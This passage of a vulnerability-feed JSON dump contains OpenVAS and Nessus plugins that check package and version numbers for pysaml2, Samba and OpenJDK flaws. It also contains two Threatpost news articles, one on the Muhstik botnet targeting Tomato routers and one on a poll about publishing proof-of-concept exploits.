"modified": "2020-01-23T00:00:00", "published": "2020-01-22T00:00:00", "id": "OPENVAS:1361412562310844302", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844302", "title": "Ubuntu Update for python-pysaml2 USN-4245-1", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844302\");\n script_version(\"2020-01-23T07:59:05+0000\");\n script_cve_id(\"CVE-2020-5390\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 07:59:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-22 04:00:37 +0000 (Wed, 22 Jan 2020)\");\n script_name(\"Ubuntu Update for python-pysaml2 USN-4245-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.04 LTS|UBUNTU19\\.10|UBUNTU19\\.04|UBUNTU16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"4245-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2020-January/005281.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python-pysaml2'\n package(s) announced via the USN-4245-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that PySAML2 incorrectly handled certain SAML files.\nAn attacker could possibly use this issue to bypass signature verification\nwith arbitrary data.\");\n\n script_tag(name:\"affected\", value:\"'python-pysaml2' package(s) on Ubuntu 19.10, Ubuntu 19.04, Ubuntu 18.04 LTS, Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"python-pysaml2\", ver:\"4.0.2-0ubuntu3.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"python3-pysaml2\", ver:\"4.0.2-0ubuntu3.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU19.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"python-pysaml2\", ver:\"4.5.0+dfsg1-0ubuntu2.19.10.1\", rls:\"UBUNTU19.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"python3-pysaml2\", ver:\"4.5.0+dfsg1-0ubuntu2.19.10.1\", rls:\"UBUNTU19.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU19.04\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"python-pysaml2\", ver:\"4.5.0+dfsg1-0ubuntu2.19.04.1\", rls:\"UBUNTU19.04\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"python3-pysaml2\", ver:\"4.5.0+dfsg1-0ubuntu2.19.04.1\", rls:\"UBUNTU19.04\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"python-pysaml2\", ver:\"3.0.0-3ubuntu1.16.04.4\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"python3-pysaml2\", ver:\"3.0.0-3ubuntu1.16.04.4\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-22T14:33:45", "bulletinFamily": "scanner", "description": "Samba is prone to a use-after-free vulnerability.", "modified": "2020-01-22T00:00:00", "published": "2020-01-22T00:00:00", "id": "OPENVAS:1361412562310143375", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310143375", "title": "Samba Use-After-Free Vulnerability (CVE-2019-19344)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:samba:samba\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.143375\");\n script_version(\"2020-01-22T10:15:43+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-22 10:15:43 +0000 (Wed, 22 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-22 08:41:58 +0000 (Wed, 22 Jan 2020)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:N/A:C\");\n\n script_cve_id(\"CVE-2019-19344\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Samba Use-After-Free Vulnerability (CVE-2019-19344)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"smb_nativelanman.nasl\", \"gb_samba_detect.nasl\");\n script_mandatory_keys(\"samba/smb_or_ssh/detected\");\n\n script_tag(name:\"summary\", value:\"Samba is prone to a use-after-free vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"During DNS zone scavenging (of expired dynamic entries) there is a read of\n memory after it has been freed.\");\n\n script_tag(name:\"affected\", value:\"Samba version 4.9 and later.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.9.18, 4.10.12, 4.11.5 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.samba.org/samba/security/CVE-2019-19344.html\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (isnull(port = get_app_port(cpe: CPE)))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif (version_in_range(version: version, test_version: \"4.9.0\", test_version2: \"4.9.17\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.9.18\", install_path: location);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"4.10.0\", test_version2: \"4.10.11\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.10.12\", install_path: location);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"4.11.0\", test_version2: \"4.11.4\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.11.5\", install_path: location);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2020-01-22T15:38:20", "bulletinFamily": "info", "description": "A new variant of the Muhstik botnet has appeared, this time with scanner technology that for the first time can brute-force web authentication to attack routers using [Tomato](<https://en.wikipedia.org/wiki/Tomato_\\(firmware\\)>) open-source firmware, researchers have found.\n\nResearchers at Palo Alto Networks\u2019 Unit 42 discovered the new variant harvesting vulnerable routers and IoT devices in early December, they reported in [a blog post](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>) Tuesday. Muhstik, showing a wormlike self-propagating capability that can infect Linux servers and IoT devices, has been active since March 2018.\n\n[](<https://register.gotowebinar.com/register/7679724086205178371?source=art>)\u201cThe new Muhstik variant scans Tomato routers on TCP port 8080 and bypasses the admin web authentication by default credentials bruteforcing,\u201d researchers wrote in their report. The default in this case being \u201cadmin:admin\u201d and \u201croot:admin.\u201d\n\n\u201cWe captured the Tomato router web authentication brute-forcing traffic,\u201d wrote Palo Alto researchers who co-authored the blog Cong Zheng, Yang Ji and Asher Davila.\n\nTomato firmware, a Linux-based non-proprietary firmware known for its stability, VPN-pass through capability, and advanced quality-of-service control, is typically used by multiple router vendors and also installed manually by end users, researchers said.\n\nTo estimate the infected volume of devices, researchers searched for fingerprints of Tomato routers in Shodan, which identified more than 4,600 Tomato routers exposed on the internet and thus vulnerable to the latest Muhstik attack.\n\nIndeed, botnet developers increasingly compromising IoT devices installed with the open-source firmware. Attackers see these devices as easy targets because they often lack regular security updates or maintenance patches necessary to keep devices secure against such attacks, researchers noted.\n\nMuhstik in the past already demonstrated the capability to use multiple vulnerability exploits to infect Linux services, such as [Oracle WebLogic](<https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/>), WordPress and [Drupal,](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) as well as routers.\n\nThe new variant also once again shows the inherent lack of security in the IoT landscape, with new attacks on these type of devices seeming to come so fast security researchers can barely keep up.\n\nEarlier this week, a hacker [published](<https://threatpost.com/hacker-leaks-more-than-500k-telnet-credentials-for-iot-devices/152015/>) a list of credentials for more than 515,000 IoT devices online, obtaining them by scanning the internet for devices with exposed Telnet ports and then using default or easy-to-guess password combinations.\n\nUnit 42 researchers published examples of the three modules of the Muhstik variant they discovered. The first module is a scanner that identifies WordPress installed on a server by sending a GET request to port 80/TCP or 8080/TCP, which are typical HTTP ports, they wrote in their report.\n\nThe second module, also a scanner, identified Webuzo solutions installed on a server by sending a GET request to port 2004/TCP, which is Webuzo\u2019s default port for administration. The request uses the path /install.php since it is the Webuzo installer file and by default a server running Webuzo will respond successfully to that request, researchers wrote.\n\nThe third module targets Oracle Weblogic Server, sending a deserialization vulnerability found in the server to port 7001/TCP\u2014the server\u2019s default\u2014that leads to a remote code execution. \u201cThis vulnerability can be exploited remotely and without previous authentication,\u201d researchers noted.\n\nResearchers said they did not discover malicious activities beyond the variant\u2019s harvesting of vulnerable Tomato routers; however, the Muhstik botnet is mainly known to launch cryptocurrency mining and DDoS attacks in IoT bots to earn profit.\n\n**_Concerned about mobile security? _**[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) **_Top 8 Best Practices for Mobile App Security, on Jan. 22 at 2 p.m. ET. _**_**Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts from **_**_Secureworks and White Ops to discuss the secrets of building a secure mobile strategy, one app at a time. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)**_._**\n", "modified": "2020-01-22T13:01:33", "published": "2020-01-22T13:01:33", "id": "THREATPOST:100FA65A8E15FE684A37DD45395A3EDE", "href": "https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/", "type": "threatpost", "title": "New Muhstik Botnet Attacks Target Tomato Routers", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-22T20:40:34", "bulletinFamily": "info", "description": "When it comes to the release of proof-of-concept (PoC) exploits, more security experts agree that the positives outweigh the negatives, according to a recent and informal Threatpost poll.\n\n[](<https://register.gotowebinar.com/register/7679724086205178371?source=art>)Last week, [Threatpost conducted a reader poll](<https://threatpost.com/poll-published-poc-exploits-good-bad/151966/>) and almost 60 percent of 230 security pundits thought it was a \u201cgood idea\u201d to publish PoC code for zero days. Up to 38 percent of respondents, meanwhile, argued it wasn\u2019t a good idea.\n\nThe debate comes on the heels of PoC code being released last week for an [unpatched remote-code-execution vulnerability](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) in the Citrix Application Delivery Controller (ADC) and Citrix Gateway products. The PoC exploits, which were published to showcase how the vulnerability in a system can be exploited, raised questions about the positive and negative consequences of releasing such code for an unpatched vulnerability.\n\nSome argued that the code can be used to test networks and pinpoint vulnerable aspects of a system, as well as motivate companies to patch, but others in the security space have argued that PoC code gives attackers a blueprint to launch and automate attacks.\n\n## Security Motivator\n\nMany security experts point to the role of PoC code publication in motivating impacted companies and manufacturers to adopt more effective security measures. That was the argument of one such advocate, Dr. Richard Gold, head of security engineering at Digital Shadows, who said that PoC code enables security teams to test if their systems are exploitable or not.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/21153903/tp-poll.png>)\n\n\u201cRather than having to rely on vendor notifications or software version number comparisons, a PoC allows the direct verification of whether a particular system is exploitable,\u201d Gold told Threatpost. \u201cThis ability to independently verify an issue allows organizations to better understand their exposure and make more informed decisions about remediation.\u201d\n\nIn fact, up to 85 percent of respondents said that the release of PoC code acts as an \u201ceffective motivator\u201d to push companies to patch. Seventy-nine percent say that the disclosure of a PoC exploit has been \u201cinstrumental\u201d in preventing an attack. And, 85 percent of respondents said that a PoC code release is acceptable if a vendor won\u2019t fix a bug in a timely manner.\n\nWhen it comes to the[ recent Citrix vulnerability (CVE-2019-19781)](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) for instance, advocates argue that, though PoC exploits were released before a patch was available, the code drew attention to the large amounts of vulnerable devices that were online. Citrix has also [accelerated its patch schedule](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) after PoC exploits were released (though there is no proof of correlation between this and the PoC exploit releases).\n\n\u201cAs a result [of the Citrix PoC exploits], there has been a widespread effort to patch or mitigate vulnerable devices rather than leaving them unpatched or unsecured,\u201d Gold stressed.\n\n## A Jump in Actual Exploits\n\nOn the flip-side of the argument, many argue that the release of the Citrix PoC exploits were a bad idea. They say attacks attempting to exploit the vulnerability skyrocketed as bad actors rushed to exploit the vulnerabilities before they are patched. In fact, 38 percent of respondents in Threatpost\u2019s poll argued that PoC exploit releases are a bad idea.\n\nMatt Thaxton, senior consultant at Crypsis Group, thinks that the \u201cultimate function of a PoC is to lower the bar for others to begin making use of the exploit.\u201d[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/21154131/tp-poll-2.png>)\n\n\u201cI believe there are more negatives than positives to publishing proofs, and generally, it is not a good idea,\u201d he told Threatpost. \u201cIn many cases, PoC\u2019s are put out largely for the notoriety/fame of the publisher and for the developer to \u2018flex\u2019 their abilities.\u201d\n\nJoseph Carson, chief security scientist at Thycotic, told Threatpost that while he thinks PoC exploits can have a positive impact, \u201cit is also important to include what defenders can do to reduce the risks such a methods to harden systems or best practices.\u201d\n\n\u201cLet\u2019s be realistic, once a zero-day is known, it is only a matter of time before nation states and cybercriminals are abusing them,\u201d said Carson. \u201cSometimes they already know about the zero-day and have been abusing them for years.\u201d\n\nRespondents in the poll were also split about the right amount of time that\u2019s appropriate to release PoC code after a flaw has been disclosed, with 29 percent arguing 90 days is the appropriate amount and others opting for one month (25 percent), one week (23 percent) or two weeks (14 percent).\n\nThis issue of a PoC exploit timeline also brings up important questions around patch management for companies dealing with the fallout of publicly-released code. Some, like Thaxton, say that PoC exploit advocates fail to recognize the complexity of patching large environments: \u201cI believe the release of PoC code functions more like an implied threat to anyone that doesn\u2019t patch: \u2018You\u2019d better patch . . . or else,'\u201d he said \u201cThis kind of threat would likely be unacceptable outside of the infosec world. This is even more obvious when PoCs are released before or alongside a patch for the vulnerability.\u201d\n\n## PoC Exploits Surge\n\nAt the end of the day, PoC exploits are continuing to be published. In fact, beyond the release of the Citrix PoC code, a slew of other PoC exploits were released last week, [including ones for](<https://threatpost.com/poc-exploits-published-for-microsoft-crypto-bug/151931/>) a recently patched [crypto-spoofing vulnerability](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) found by the [National Security Agency](<https://threatpost.com/podcast-nsa-reports-major-crypto-spoofing-bug-to-microsoft/151900/>) (NSA) and [reported to Microsoft](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>); and another for critical flaws impacting the [Cisco Data Center Network Manager](<https://threatpost.com/cisco-dcnm-flaw-exploit/151949/>) tool for managing network platforms and switches.\n\nGold, for his part, argued that distinguishing a fine line between a theoretical vulnerability and a successful exploitation of a real system makes all the difference when it comes to PoC exploits versus active exploits.\n\n\u201cOnce that threshold has been crossed, it is understood that attackers will most likely be exploiting this vulnerability in real attacks,\u201d he said. \u201cThis often provided impetus to companies to patch their systems.\u201d\n\n**_Concerned about mobile security? _**[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) **_Top 8 Best Practices for Mobile App Security, on Jan. 22 at 2 p.m. ET. _**_**Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts from **_**_Secureworks and White Ops to discuss the secrets of building a secure mobile strategy, one app at a time. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)**_._**\n\nWrite a comment\n\n**Share this article:**\n\n * [Featured](<https://threatpost.com/category/featured/>)\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "modified": "2020-01-22T11:01:52", "published": "2020-01-22T11:01:52", "id": "THREATPOST:48D622E76FCC26F28B32364668BB1930", "href": "https://threatpost.com/poc-exploits-do-more-good-than-harm-threatpost-poll/152053/", "type": "threatpost", "title": "PoC Exploits Do More Good Than Harm: Threatpost Poll", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-01-23T17:50:00", "bulletinFamily": "scanner", "description": "An update for java-1.8.0-openjdk is now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime\nEnvironment and the OpenJDK 8 Java Software Development Kit.\n\nSecurity Fix(es) :\n\n* OpenJDK: Use of unsafe RSA-MD5 checkum in Kerberos TGS (Security,\n8229951) (CVE-2020-2601)\n\n* OpenJDK: Serialization filter changes via jdk.serialFilter property\nmodification (Serialization, 8231422) (CVE-2020-2604)\n\n* OpenJDK: Improper checks of SASL message properties in GssKrb5Base\n(Security, 8226352) (CVE-2020-2590)\n\n* OpenJDK: Incorrect isBuiltinStreamHandler causing URL normalization\nissues (Networking, 8228548) (CVE-2020-2593)\n\n* OpenJDK: Excessive memory usage in OID processing in X.509\ncertificate parsing (Libraries, 8234037) (CVE-2020-2654)\n\n* OpenJDK: Incorrect exception processing during deserialization in\nBeanContextSupport (Serialization, 8224909) (CVE-2020-2583)\n\n* OpenJDK: Incomplete enforcement of maxDatagramSockets limit in\nDatagramChannelImpl (Networking, 8231795) (CVE-2020-2659)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.", "modified": "2020-01-02T00:00:00", "id": "REDHAT-RHSA-2020-0196.NASL", "href": "https://www.tenable.com/plugins/nessus/133167", "published": "2020-01-22T00:00:00", "title": "RHEL 7 : java-1.8.0-openjdk (RHSA-2020:0196)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2020:0196. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133167);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2020/01/22\");\n\n script_cve_id(\"CVE-2020-2583\", \"CVE-2020-2590\", \"CVE-2020-2593\", \"CVE-2020-2601\", \"CVE-2020-2604\", \"CVE-2020-2654\", \"CVE-2020-2659\");\n script_xref(name:\"RHSA\", value:\"2020:0196\");\n\n script_name(english:\"RHEL 7 : java-1.8.0-openjdk (RHSA-2020:0196)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for java-1.8.0-openjdk is now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime\nEnvironment and the OpenJDK 8 Java Software Development Kit.\n\nSecurity Fix(es) :\n\n* OpenJDK: Use of unsafe RSA-MD5 checkum in Kerberos TGS (Security,\n8229951) (CVE-2020-2601)\n\n* OpenJDK: Serialization filter changes via jdk.serialFilter property\nmodification (Serialization, 8231422) (CVE-2020-2604)\n\n* OpenJDK: Improper checks of SASL message properties in GssKrb5Base\n(Security, 8226352) (CVE-2020-2590)\n\n* OpenJDK: Incorrect isBuiltinStreamHandler causing URL normalization\nissues (Networking, 8228548) (CVE-2020-2593)\n\n* OpenJDK: Excessive memory usage in OID processing in X.509\ncertificate parsing (Libraries, 8234037) (CVE-2020-2654)\n\n* OpenJDK: Incorrect exception processing during deserialization in\nBeanContextSupport (Serialization, 8224909) (CVE-2020-2583)\n\n* OpenJDK: Incomplete enforcement of maxDatagramSockets limit in\nDatagramChannelImpl (Networking, 8231795) (CVE-2020-2659)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2020:0196\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2020-2583\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2020-2590\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2020-2593\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2020-2601\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2020-2604\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2020-2654\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2020-2659\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-openjdk-accessibility\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-openjdk-accessibility-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-openjdk-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-openjdk-demo-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-openjdk-devel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-openjdk-headless-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-openjdk-javadoc-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-openjdk-javadoc-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-openjdk-javadoc-zip-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-openjdk-src-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2020:0196\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"i686\", reference:\"java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7\")) 